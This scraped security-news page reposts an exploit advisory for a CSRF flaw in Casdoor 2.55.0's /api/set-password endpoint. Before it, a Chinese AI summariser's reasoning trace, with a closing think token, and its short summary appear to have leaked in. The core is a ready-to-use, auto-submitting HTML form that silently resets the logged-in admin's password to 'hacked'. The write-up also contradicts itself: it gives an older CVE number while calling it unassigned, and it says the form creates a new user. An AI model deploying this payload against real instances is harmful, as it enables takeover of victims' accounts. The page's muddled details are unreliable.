嗯,用户让我帮忙总结一篇文章的内容,控制在100字以内,而且不需要特定的开头。首先,我需要仔细阅读文章内容,理解其主要信息。 文章标题提到Casdoor 2.55.0版本存在CSRF漏洞,影响/api/set-password端点。攻击者可以利用这个漏洞通过恶意URL更改用户密码。作者提供了PoC代码,展示了如何构造请求。此外,提到了CVE编号和测试环境。 接下来,我需要将这些信息浓缩到100字以内。要确保包含关键点:漏洞名称、影响版本、攻击方式、PoC的存在以及CVE编号。 最后,组织语言,使其简洁明了。避免使用复杂的术语,让总结易于理解。 </think> Casdoor 2.55.0版本中发现CSRF漏洞,影响/api/set-password端点。攻击者可通过构造恶意URL更改用户密码。该漏洞已提供PoC验证,并分配CVE-2023-34927编号。 2026-2-19 21:6:19 Author: cxsecurity.com(查看原文) 阅读量:2 收藏
# Exploit Title: Casdoor 2.55.0 - Cross-Site Request Forgery (CSRF) # Application: Casdoor # Version: 2.55.0 # Date: 09/10/2025 # Exploit Author: Van Lam Nguyen # Facebook: vanlam1412 # Vendor Homepage: https://casdoor.org/ # Software Link: https://github.com/casdoor/casdoor/archive/refs/tags/v2.55.0.zip # Tested on: Windows # CVE : CVE-2023-34927 ( latest yet to be assigned) Overview ================================================== Casdoor v2.55.0 and below was discovered to contain a Cross-Site Request Forgery (CSRF) in the endpoint /api/set-password. This vulnerability allows attackers to arbitrarily change the victim user's password via supplying a crafted URL. Proof of Concept ================================================== Made an unauthorized request to /api/set-password that bypassed the old password entry authentication step <html> <form action="http://localhost:8000/api/set-password" method="POST"> <input name='userOwner' value='built-in' type='hidden'> <input name='userName' value='admin' type='hidden'> <input name='newPassword' value='hacked' type='hidden'> <input type=submit> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </html> If a user is logged into the Casdoor Webapp at time of execution, a new user will be created in the app with the following credentials userOwner: built-in userName: admin newPassword: hacked
Thanks for you comment!
Your message is in quarantine 48 hours.
如有侵权请联系:admin#unsafe.sh